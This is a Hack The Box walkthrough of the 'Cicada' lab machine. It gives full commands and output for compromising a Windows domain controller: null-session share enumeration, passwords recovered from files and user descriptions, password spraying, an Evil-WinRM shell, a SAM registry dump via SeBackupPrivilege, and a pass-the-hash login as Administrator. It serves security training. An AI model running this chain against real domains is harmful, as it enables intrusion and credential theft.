Description
Cicada is an easy Hack The Box machine that features:
- Domain Controller enumeration using a NULL session
- User credentials recovered from a share accesible with a NULL session
- Domain Controller enumeration using a domain account
- User credentials recovered from the description of an user of the domain
- User credentials recovered from a share accesible with a domain account
- Initial access to the machine with a domain account that belongs to the
Remote Management Usersgroup - Privilege Escalation via a dump of the SAM database using a domain account with the
SeBackupPrivilegeprivilege
Footprinting
First, we are going to check with ping command if the machine is active and the system operating system. The target machine IP address is 10.129.209.245.
$ ping -c 3 10.129.209.245
PING 10.129.209.245 (10.129.209.245) 56(84) bytes of data.
64 bytes from 10.129.209.245: icmp_seq=1 ttl=127 time=44.9 ms
64 bytes from 10.129.209.245: icmp_seq=2 ttl=127 time=44.5 ms
64 bytes from 10.129.209.245: icmp_seq=3 ttl=127 time=44.0 ms
--- 10.129.209.245 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 44.009/44.471/44.948/0.383 ms
The machine is active and with the TTL that equals 127 (128 minus 1 jump) we can assure that it is an Windows machine. Now we are going to do a Nmap TCP SYN port scan to check all opened ports.
$ sudo nmap 10.129.209.245 -sS -oN nmap_scan
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 10.129.209.245
Host is up (0.052s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds
We get many open ports, related to a Domain Controller Active Directory.
Enumeration
Then we do a more advanced scan, with service version and scripts.
$ nmap 10.129.209.245 -Pn -sV -sC -p53,88,135,139,389,445,464,636,3268,3269 -oN nmap_scan_ports
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 10.129.209.245
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
|_ start_date: N/A
|_clock-skew: 7h00m02s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.68 seconds
We get the services related to an Active Directory, specifically the Domain Controller CICADA-DC.cicada.htb. We add the hosts to our /etc/hosts local file.
$ echo "10.129.209.245 cicada.htb" | sudo tee -a /etc/hosts
We can start the enumeration and check if we can use a NULL session with enum4linux-ng tool.
$ enum4linux-ng -As 10.129.209.245
ENUM4LINUX - next generation (v1.3.4)
==========================
| Target Information |
==========================
[*] Target ........... 10.129.209.245
[*] Username ......... ''
[*] Random Username .. 'wryjxord'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
...
==========================================
| RPC Session Check on 10.129.209.245 |
==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[+] Server allows session using username 'wryjxord', password ''
[H] Rerunning enumeration with user 'wryjxord' might give more results
We see we can user NULL sessions, but we can also use a random username, in this case, wryjxord. We can re-run the enumeration using crackmapexec tool to check for available shares.
$ crackmapexec smb 10.129.209.245 -u 'wryjxord' -p '' --shares
SMB 10.129.209.245 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.209.245 445 CICADA-DC [+] cicada.htb\wryjxord:
SMB 10.129.209.245 445 CICADA-DC [+] Enumerated shares
SMB 10.129.209.245 445 CICADA-DC Share Permissions Remark
SMB 10.129.209.245 445 CICADA-DC ----- ----------- ------
SMB 10.129.209.245 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.209.245 445 CICADA-DC C$ Default share
SMB 10.129.209.245 445 CICADA-DC DEV
SMB 10.129.209.245 445 CICADA-DC HR READ
SMB 10.129.209.245 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.209.245 445 CICADA-DC NETLOGON Logon server share
SMB 10.129.209.245 445 CICADA-DC SYSVOL Logon server share
We find the DEV share, which cannot by read by us and the HR share with read permission. Let’s sign-in into the share and download the available files.
$ smbclient '\\10.129.209.245\HR' -U 'wryjxord%'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:29:09 2024
.. D 0 Thu Mar 14 13:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 19:31:48 2024
4168447 blocks of size 4096. 260699 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (7,0 KiloBytes/sec) (average 7,0 KiloBytes/sec)
We get the Notice from HR.txt file. In its contents we find a password, Cicada$M6Corpb*@Lp#nZp!8.
$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
Now, with this password, we need to discover usernames to do a password-spray attack. We can enumerate the domain users using RID cycling technique and the crackmapexec tool.
$ crackmapexec smb 10.129.209.245 -u 'xnfjsk' -p '' --rid-brute | grep SidTypeUser
SMB 10.129.209.245 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
We find the domain users john.smoulder, sarah.dantelia, michael.wrightson, david.orelious and emily.oscars. Let’s password-pray them.
$ crackmapexec smb 10.129.209.245 -u users -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB 10.129.209.245 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.209.245 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.209.245 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.209.245 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.209.245 445 CICADA-DC [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.209.245 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
We find the password of the michael.wrightson, Cicada$M6Corpb*@Lp#nZp!8. Now we can use the credential to enumerate the domain using enum4linux-ng tool. We can enumerate the domain users and their descriptions.
$ enum4linux-ng -As -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.129.209.245
ENUM4LINUX - next generation (v1.3.4)
...
=======================================
| Users via RPC on 10.129.209.245 |
=======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 8 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 8 user(s) via 'enumdomusers'
[+] After merging user results we have 8 user(s) total:
'1104':
username: john.smoulder
name: (null)
acb: '0x00000210'
description: (null)
'1105':
username: sarah.dantelia
name: (null)
acb: '0x00000210'
description: (null)
'1106':
username: michael.wrightson
name: (null)
acb: '0x00000210'
description: (null)
'1108':
username: david.orelious
name: (null)
acb: '0x00000210'
description: Just in case I forget my password is aRt$Lp#7t*VQ!3
'1601':
username: emily.oscars
name: Emily Oscars
acb: '0x00000210'
description: (null)
'500':
username: Administrator
name: (null)
acb: '0x00000210'
description: Built-in account for administering the computer/domain
'501':
username: Guest
name: (null)
acb: '0x00000214'
description: Built-in account for guest access to the computer/domain
'502':
username: krbtgt
name: (null)
acb: '0x00020011'
description: Key Distribution Center Service Account
We find the password of the david.orelious user in its description aRt$Lp#7t*VQ!3. We can enumerate again the domain for the shares.
$ crackmapexec smb 10.129.209.245 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.209.245 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.209.245 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.209.245 445 CICADA-DC [+] Enumerated shares
SMB 10.129.209.245 445 CICADA-DC Share Permissions Remark
SMB 10.129.209.245 445 CICADA-DC ----- ----------- ------
SMB 10.129.209.245 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.209.245 445 CICADA-DC C$ Default share
SMB 10.129.209.245 445 CICADA-DC DEV READ
SMB 10.129.209.245 445 CICADA-DC HR READ
SMB 10.129.209.245 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.209.245 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.209.245 445 CICADA-DC SYSVOL READ Logon server share
With this user we have access to the DEV share so we connect to it and download the files.
$ smbclient '\\10.129.209.245\DEV' -U 'david.orelious%aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:31:39 2024
.. D 0 Thu Mar 14 13:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 19:28:22 2024
4168447 blocks of size 4096. 332275 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (3,3 KiloBytes/sec) (average 3,3 KiloBytes/sec)
We get the Backup_script.ps1 script which have the credentials for the emily.oscars with the Q!3@Lp#M6b*7t*Vt password.
$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
Exploitation
We can connect to the machine and obtain a shell using the emily.oscars user.
$ evil-winrm -i 10.129.209.245 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars
Post-Exploitation
We find that the user has the emily.oscars has the SeBackupPrivilege privilege.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
With this privilege we can dump the SYSTEM and SAM registry areas and then download the files with the download functionality of evil-winrm.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> download system
Info: Downloading C:\Users\emily.oscars.CICADA\system to system
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> download sam
Info: Downloading C:\Users\emily.oscars.CICADA\sam to sam
Info: Download successful!
Then in our system we can user impacket-secretdump to dump the Administrator NTLM hash, 2b87e7c93a3e8a0ea4a581937016f341.
$ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
Now we can use the NTLM hash to login in the machine.
$ evil-winrm -i 10.129.209.241 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
Flags
With the Administrator session we can obtain the user and proof flags.
*Evil-WinRM* PS C:\Users\Administrator\Documents> type c:\users\emily.oscars.CICADA\Desktop\user.txt
<REDACTED>
*Evil-WinRM* PS C:\Users\Administrator\Documents> type c:\users\Administrator\Desktop\root.txt
<REDACTED>